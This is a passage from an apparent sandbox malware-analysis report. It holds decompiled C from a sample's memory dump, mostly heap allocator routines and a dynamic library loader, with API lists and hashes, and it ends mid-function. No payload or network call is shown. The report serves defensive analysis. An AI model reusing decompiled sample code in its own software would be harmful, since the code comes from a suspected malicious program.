							if((0xfffffffe << _t132 &  *0x329b724) == 0) {
								_t133 =  *0x329b720; // 0x70050
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E032615CC(_t125);
								} else {
									_t110 =  *0x329b71c; // 0x9230060
									_t109 = _t110 - _t125;
									 *0x329b71c = _t109;
									 *0x329b720 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x329b718 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L47;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L47:
							_push(_t152);
							_push(_t145);
							_t148 = 0x329b7a8 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x329b728 + _t142 * 4;
								 *_t80 =  *(0x329b728 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x329b724], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E03261500(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x329b718 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x329b5c0) & 0x000000ff;
					__ebx = 0x3289040 + ( *(__edx + 0x329b5c0) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									__eflags = __ebx;
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [ebx], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x329b04d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x329b718], ah");
									if(__eflags == 0) {
										goto L20;
									}
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [0x329b718], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
									goto L20;
								}
							}
							L20:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x329b724;
							__eflags =  *(__ebx + 1) &  *0x329b724;
							if(( *(__ebx + 1) &  *0x329b724) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x329b720; // 0x70050
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E032615CC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										 *0x329b718 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x329b71c; // 0x9230060
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x329b720 =  *0x329b720 - __edi;
									 *0x329b71c = __esi;
									goto L33;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x329b728 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x329b728 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x329b7a8 + ( *(0x329b728 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x329b728 + __eax * 4;
									 *_t38 =  *(0x329b728 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x329b724], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E03261500(__eax, __ecx, __edx);
								}
								L33:
								_t56 = __edi + 6; // 0x70056
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x329b718 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x9230080
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x03261730
0x03261736
0x03261968
0x0326196d
0x03261a80
0x03261a81
0x03261a83
0x03261684
0x03261688
0x03261694
0x032616a4
0x032616a9
0x032616ad
0x032616af
0x032616b1
0x032616b7
0x032616ba
0x032616bf
0x032616c4
0x032616ca
0x032616d0
0x032616d3
0x032616d5
0x032616dc
0x032616dc
0x032616e5
0x03261a89
0x03261a89
0x03261a8b
0x03261a8b
0x03261973
0x0326197f
0x03261982
0x03261984
0x03261938
0x0326193d
0x03261945
0x00000000
0x00000000
0x03261949
0x03261953
0x0326195b
0x0326195f
0x00000000
0x0326195f
0x00000000
0x0326195b
0x03261938
0x03261986
0x03261986
0x0326198e
0x03261991
0x0326199b
0x0326199b
0x032619a2
0x032619b5
0x032619b9
0x032619bf
0x032619d8
0x032619de
0x032619de
0x032619e0
0x032619fe
0x032619e2
0x032619e2
0x032619e7
0x032619e9
0x032619ee
0x032619f7
0x032619f7
0x03261a03
0x03261a0b
0x032619c1
0x032619c1
0x032619cb
0x032619d3
0x00000000
0x032619d3
0x032619a4
0x032619a7
0x032619aa
0x03261a0c
0x03261a0c
0x03261a0d
0x03261a0e
0x03261a15
0x03261a18
0x03261a1b
0x03261a1e
0x03261a20
0x03261a22
0x03261a29
0x03261a2b
0x03261a2b
0x03261a2b
0x03261a32
0x03261a34
0x03261a34
0x03261a32
0x03261a40
0x03261a45
0x03261a45
0x03261a47
0x03261a68
0x03261a68
0x03261a68
0x03261a49
0x03261a49
0x03261a4f
0x03261a52
0x03261a56
0x03261a5c
0x03261a5e
0x03261a5e
0x03261a5c
0x03261a70
0x03261a73
0x03261a7f
0x03261a7f
0x032619a2
0x0326173c
0x0326173c
0x0326173e
0x03261745
0x0326174c
0x032617a4
0x032617a4
0x032617a9
0x032617ad
0x00000000
0x00000000
0x032617af
0x032617af
0x032617b2
0x032617b7
0x032617bb
0x032617bd
0x032617bd
0x032617c0
0x032617c5
0x032617c9
0x032617cb
0x032617cb
0x032617d0
0x032617d5
0x032617da
0x032617de
0x032617e6
0x00000000
0x032617e6
0x032617de
0x032617c9
0x00000000
0x032617bb
0x032617a4
0x0326174e
0x0326174e
0x03261751
0x03261754
0x03261759
0x0326175b
0x03261774
0x03261777
0x0326177b
0x0326177d
0x03261780
0x032617f0
0x032617f1
0x032617f2
0x032617f9
0x032617fb
0x032617fb
0x03261800
0x03261808
0x00000000
0x00000000
0x0326180c
0x03261811
0x03261816
0x0326181e
0x03261822
0x00000000
0x03261822
0x00000000
0x0326181e
0x032617fb
0x0326182c
0x03261830
0x03261830
0x03261836
0x032618a8
0x032618ac
0x032618b2
0x032618b4
0x032618dc
0x032618e0
0x032618e2
0x032618e7
0x032618e9
0x032618eb
0x00000000
0x032618ed
0x032618ed
0x032618f2
0x032618f4
0x032618f5
0x032618f6
0x032618f7
0x032618f7
0x032618b6
0x032618b6
0x032618bc
0x032618c0
0x032618c6
0x032618c8
0x032618ca
0x032618ca
0x032618cc
0x032618ce
0x032618d4
0x00000000
0x032618d4
0x03261838
0x03261838
0x0326183b
0x03261842
0x03261849
0x0326184c
0x0326184f
0x03261856
0x03261859
0x0326185c
0x0326185f
0x03261861
0x03261863
0x03261865
0x0326186a
0x0326186c
0x0326186c
0x0326186c
0x03261873
0x03261875
0x03261875
0x03261873
0x0326187c
0x03261881
0x03261884
0x0326188a
0x032618f8
0x032618f8
0x032618f8
0x0326188c
0x0326188c
0x0326188e
0x03261892
0x03261894
0x03261897
0x0326189a
0x0326189d
0x032618a1
0x032618a1
0x032618fd
0x032618fd
0x032618fd
0x03261900
0x03261903
0x03261905
0x0326190a
0x0326190c
0x0326190f
0x03261916
0x03261919
0x03261919
0x0326191c
0x03261920
0x03261923
0x03261926
0x03261928
0x03261928
0x0326192a
0x0326192d
0x03261930
0x03261933
0x03261934
0x03261935
0x03261936
0x03261936
0x03261782
0x03261782
0x03261782
0x03261782
0x03261786
0x03261789
0x0326178c
0x0326178f
0x03261790
0x03261790
0x0326175d
0x0326175d
0x03261761
0x03261761
0x03261764
0x03261767
0x0326176a
0x03261794
0x03261797
0x0326179a
0x0326179d
0x032617a0
0x032617a1
0x0326176c
0x0326176c
0x0326176f
0x03261770
0x03261770
0x0326176a
0x0326175b

APIs

Sleep.KERNEL32(00000000), ref: 032617D0
Sleep.KERNEL32(0000000A,00000000), ref: 032617E6

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b681fc1f67b4ec08374b8c7159054cad56d8dcb6c30c45c034f24359c73f7033
Instruction ID: ee9989b0e973dee3bd9cb34c5c15f358633d432af3dc225919232f2f2f94290b
Opcode Fuzzy Hash: b681fc1f67b4ec08374b8c7159054cad56d8dcb6c30c45c034f24359c73f7033
Instruction Fuzzy Hash: 1BB1D176A213518BDB15DF28F8883A5BBE1EF85351F18C2AED4458B389D770B8E1C790

Uniqueness

Uniqueness Score: -1.00%

Function 03261A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E03261A8C(void* __eax, void* __edi) {
				signed int __ebx;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				void _t57;
				int _t58;
				signed int _t65;
				void* _t67;
				signed int _t69;
				intOrPtr _t70;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				void* _t82;
				void _t85;
				void* _t87;
				void* _t89;

				_t48 = __eax;
				_t77 =  *(__eax - 4);
				_t65 =  *0x329b04d; // 0x0
				if((_t77 & 0x00000007) != 0) {
					__eflags = _t77 & 0x00000005;
					if((_t77 & 0x00000005) != 0) {
						_pop(_t65);
						__eflags = _t77 & 0x00000003;
						if((_t77 & 0x00000003) != 0) {
							return 0xffffffff;
						} else {
							_push(_t65);
							_t67 = __eax - 0x10;
							E03261644();
							_t50 = _t67;
							_t85 =  *_t50;
							_t82 =  *(_t50 + 4);
							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
							if(_t51 == 0) {
								_t52 = _t51 | 0xffffffff;
								__eflags = _t52;
							} else {
								 *_t82 = _t85;
								 *(_t85 + 4) = _t82;
								_t52 = 0;
							}
							 *0x329d7a8 = 0;
							return _t52;
						}
					} else {
						goto L21;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L6;
							}
							Sleep(0);
							__edx = __edx;
							__ecx = __ecx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags != 0) {
								Sleep(0xa);
								__edx = __edx;
								__ecx = __ecx;
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t6 = __edx + 0xc;
					 *_t6 =  *(__edx + 0xc) - 1;
					__eflags =  *_t6;
					__eax =  *(__edx + 8);
					if( *_t6 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L12:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L12;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x329b04d; // 0x0
						L21:
						__eflags = _t65;
						_t69 = _t77 & 0xfffffff0;
						_push(_t84);
						_t87 = _t48;
						if(__eflags != 0) {
							while(1) {
								_t54 = 0x100;
								asm("lock cmpxchg [0x329b718], ah");
								if(__eflags == 0) {
									goto L22;
								}
								Sleep(0);
								_t54 = 0x100;
								asm("lock cmpxchg [0x329b718], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L22;
							}
						}
						L22:
						__eflags = (_t87 - 4)[_t69] & 0x00000001;
						_t75 = (_t87 - 4)[_t69];
						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
							_t54 = _t69 + _t87;
							_t76 = _t75 & 0xfffffff0;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E032614C0(_t54);
							}
						} else {
							_t76 = _t75 | 0x00000008;
							__eflags = _t76;
							(_t87 - 4)[_t69] = _t76;
						}
						__eflags =  *(_t87 - 4) & 0x00000008;
						if(( *(_t87 - 4) & 0x00000008) != 0) {
							_t76 =  *(_t87 - 8);
							_t87 = _t87 - _t76;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E032614C0(_t87);
							}
						}
						__eflags = _t69 - 0x13fff0;
						if(_t69 == 0x13fff0) {
							__eflags =  *0x329b720 - 0x13fff0;
							if( *0x329b720 != 0x13fff0) {
								_t70 = _t87 + 0x13fff0;
								E03261560(_t54);
								 *((intOrPtr*)(_t70 - 4)) = 2;
								 *0x329b720 = 0x13fff0;
								 *0x329b71c = _t70;
								 *0x329b718 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t89 = _t87 - 0x10;
								_t57 =  *_t89;
								_t79 =  *(_t89 + 4);
								 *(_t57 + 4) = _t79;
								 *_t79 = _t57;
								 *0x329b718 = 0;
								_t58 = VirtualFree(_t89, 0, 0x8000);
								__eflags = _t58 - 1;
								asm("sbb eax, eax");
								return _t58;
							}
						} else {
							 *(_t87 - 4) = _t69 + 3;
							 *(_t87 - 8 + _t69) = _t69;
							E03261500(_t87, _t76, _t69);
							 *0x329b718 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x03261a8c
0x03261a8c
0x03261a95
0x03261a9b
0x03261b6c
0x03261b6f
0x03261c5c
0x03261c5d
0x03261c60
0x03261c6b
0x032616e8
0x032616e8
0x032616ed
0x032616f0
0x032616f5
0x032616f7
0x032616f9
0x03261704
0x0326170b
0x03261716
0x03261716
0x0326170d
0x0326170d
0x0326170f
0x03261712
0x03261712
0x03261719
0x03261723
0x03261723
0x00000000
0x00000000
0x00000000
0x03261aa1
0x03261aa1
0x03261aa3
0x03261aa5
0x03261b08
0x03261b08
0x03261b0d
0x03261b11
0x00000000
0x00000000
0x03261b17
0x03261b1c
0x03261b1d
0x03261b1e
0x03261b23
0x03261b27
0x03261b31
0x03261b36
0x03261b37
0x00000000
0x03261b37
0x00000000
0x03261b27
0x03261b08
0x03261aa7
0x03261aa7
0x03261aa7
0x03261aa7
0x03261aab
0x03261aae
0x03261adc
0x03261ade
0x03261af3
0x03261af3
0x03261ae0
0x03261ae0
0x03261ae3
0x03261ae6
0x03261ae9
0x03261aec
0x03261aee
0x03261af1
0x00000000
0x00000000
0x03261af1
0x03261af6
0x03261af8
0x03261afa
0x03261afd
0x03261b75
0x03261b78
0x03261b7a
0x03261b7c
0x03261b7d
0x03261b7f
0x03261b3c
0x03261b3c
0x03261b41
0x03261b49
0x00000000
0x00000000
0x03261b4d
0x03261b52
0x03261b57
0x03261b5f
0x03261b63
0x00000000
0x03261b63
0x00000000
0x03261b5f
0x03261b3c
0x03261b81
0x03261b81
0x03261b89
0x03261b8d
0x03261bc4
0x03261bc7
0x03261bca
0x03261bcc
0x03261bd2
0x03261bd4
0x03261bd4
0x03261b8f
0x03261b8f
0x03261b8f
0x03261b92
0x03261b92
0x03261b96
0x03261b9a
0x03261bdc
0x03261bdf
0x03261be1
0x03261be3
0x03261be9
0x03261bed
0x03261bed
0x03261be9
0x03261b9c
0x03261ba2
0x03261bf4
0x03261bfe
0x03261c2c
0x03261c32
0x03261c37
0x03261c3e
0x03261c48
0x03261c4e
0x03261c55
0x03261c59
0x03261c00
0x03261c00
0x03261c03
0x03261c05
0x03261c08
0x03261c0b
0x03261c0d
0x03261c1c
0x03261c21
0x03261c24
0x03261c28
0x03261c28
0x03261ba4
0x03261ba7
0x03261baa
0x03261bb2
0x03261bb7
0x03261bbe
0x03261bc2
0x03261bc2
0x03261ab0
0x03261ab0
0x03261ab2
0x03261ab8
0x03261abb
0x03261ac4
0x03261ac7
0x03261aca
0x03261acd
0x03261ad0
0x03261ad3
0x03261ad6
0x03261ad6
0x03261ad8
0x03261ad9
0x03261abd
0x03261abd
0x03261abd
0x03261abf
0x03261ac1
0x03261ac2
0x03261ac2
0x03261abb
0x03261aae

APIs

Sleep.KERNEL32(00000000,?,?,00000000,03261FE4), ref: 03261B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03261FE4), ref: 03261B31

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7254447fef5165c620f5f0f2e9ca8e4ed7ade65d0acfc42498e3f46a72977a13
Instruction ID: 60e4d5440c9c8155ffc60228732dcddf6966bc45c9de09300a48dae51e17f695
Opcode Fuzzy Hash: 7254447fef5165c620f5f0f2e9ca8e4ed7ade65d0acfc42498e3f46a72977a13
Instruction Fuzzy Hash: 5B51D0766203418FD715DF68E984766BBD4AF45310F1882AED444CB38AE7B0F8D5C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 03277C04 Relevance: 6.0, APIs: 4, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03277C04(intOrPtr __eax, void* __ecx, char __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t27;
				intOrPtr _t37;
				void* _t41;

				_v12 = __edx;
				_v8 = __eax;
				E03264954(_v8);
				E03264954(_v12);
				_push(_t41);
				_push(0x3277ca2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41 + 0xfffffff8;
				LoadLibraryExA(E03264964(_v8), 0, 0); // executed
				 *0x329e344 = GetModuleHandleA(E03264964(_v8));
				_t22 = E03264964(_v12);
				_t23 =  *0x329e344; // 0x73990000
				 *0x329e348 = GetProcAddress(_t23, _t22);
				E03277BD8(0x3266748);
				_t27 =  *0x329e344; // 0x73990000
				FreeLibrary(_t27); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x3277ca9);
				return E032644C4( &_v12, 2);
			}

0x03277c0a
0x03277c0d
0x03277c13
0x03277c1b
0x03277c22
0x03277c23
0x03277c28
0x03277c2b
0x03277c3c
0x03277c4f
0x03277c57
0x03277c5d
0x03277c68
0x03277c77
0x03277c7c
0x03277c82
0x03277c89
0x03277c8c
0x03277c8f
0x03277ca1

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID:
API String ID: 1437655972-0
Opcode ID: 37555854c3415e9d4a3f2076d2818d67c24ea6ae523dc559c285b114bf702bd4
Instruction ID: 5d02b2996a51df073bccbc5181b6319c46fa71d393f7c8ad58ccebe7596a407d
Opcode Fuzzy Hash: 37555854c3415e9d4a3f2076d2818d67c24ea6ae523dc559c285b114bf702bd4
Instruction Fuzzy Hash: 2D019278A24308BFDB00FBA9E956A6D77A8EF49200FA14075A008EB650E7749DC0CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0326E348 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0326E348(signed short* __eax, void* __ecx) {
				void* _t7;
				signed short _t18;
				intOrPtr* _t19;

				_t12 = __eax;
				_t18 =  *__eax & 0x0000ffff;
				if(_t18 >= 0x14) {
					if(_t18 != 0x100) {
						if(_t18 != 0x101) {
							if((_t18 & 0x00002000) == 0) {
								_t7 = E03272E88(_t18, _t19);
								if(_t7 == 0) {
									L0326CDCC();
									L0326CDC4();
								} else {
									_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t19)) + 0x24))();
								}
							} else {
								_t7 = E0326E1CC(__eax);
							}
						} else {
							_t7 =  *0x329e29c();
						}
					} else {
						 *__eax = 0;
						_t7 = E032644A0( &(__eax[4]));
					}
				} else {
					_push(__eax); // executed
					L0326CDCC(); // executed
					_t7 = E0326E014(__eax);
				}
				return _t7;
			}

0x0326e34b
0x0326e34d
0x0326e354
0x0326e368
0x0326e37e
0x0326e38f
0x0326e39e
0x0326e3a5
0x0326e3b4
0x0326e3ba
0x0326e3a7
0x0326e3ae
0x0326e3ae
0x0326e391
0x0326e393
0x0326e393
0x0326e380
0x0326e382
0x0326e382
0x0326e36a
0x0326e36a
0x0326e372
0x0326e372
0x0326e356
0x0326e356
0x0326e357
0x0326e35c
0x0326e35c
0x0326e3c2

APIs

VariantClear.OLEAUT32(?), ref: 0326E357

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: bb7954ca2bed2c71880699bff8de0a32f381e8c1452ff9e2061d01778642f373
Instruction ID: d44e7bbf5bee79c71354db64c95f00bc3a20ac5be0d77b71bcbf7609645eb53c
Opcode Fuzzy Hash: bb7954ca2bed2c71880699bff8de0a32f381e8c1452ff9e2061d01778642f373
Instruction Fuzzy Hash: 0FF0C22D734210C7C710FB38DF84579379C9FD0610726B466E4879F296CBA48CE583A2

Uniqueness

Uniqueness Score: -1.00%

Function 032770D4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E032770D4(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed char* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				char _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				signed int _v48;
				signed int _v52;
				signed int* _v56;
				signed int* _v60;
				signed int _v64;
				signed int* _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v1620;
				signed int _t140;
				intOrPtr _t141;
				intOrPtr* _t142;
				intOrPtr _t145;
				signed char _t153;
				signed char _t154;
				signed int* _t161;
				signed int _t203;
				signed int _t204;
				void* _t205;
				intOrPtr _t219;
				intOrPtr _t220;
				intOrPtr _t221;
				signed int _t250;
				intOrPtr _t251;
				signed char* _t253;
				void* _t256;
				void* _t257;
				intOrPtr _t258;
				void* _t272;

				_t272 = __fp0;
				_t256 = _t257;
				_t258 = _t257 + 0xfffff9b0;
				_v44 = __ecx;
				_t253 = __edx;
				_v40 = __eax;
				_t219 =  *0x326cd60; // 0x326cd64
				E03264F04( &_v36, _t219);
				_push(_t256);
				_push(0x32773ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_v52 = 0;
				_t207 = 0;
				_push(_t256);
				_push(0x32773dc);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t258;
				_t250 =  *(__edx + 1) & 0x000000ff;
				if(_t250 > 0x40) {
					_t207 =  *0x329a818; // 0x3276a08
					E0326B02C(_t207, 1);
					E03263E5C();
				}
				if(_t250 == 0) {
					L25:
					_v84 =  &_v1620;
					_v80 = _v44 + 4;
					_v76 = _t250;
					_v72 = _t253[2] & 0x000000ff;
					_t220 =  *_v44;
					_t140 =  *_t253 & 0x000000ff;
					if(_t140 != 4) {
						__eflags = _t140 - 1;
						if(__eflags == 0) {
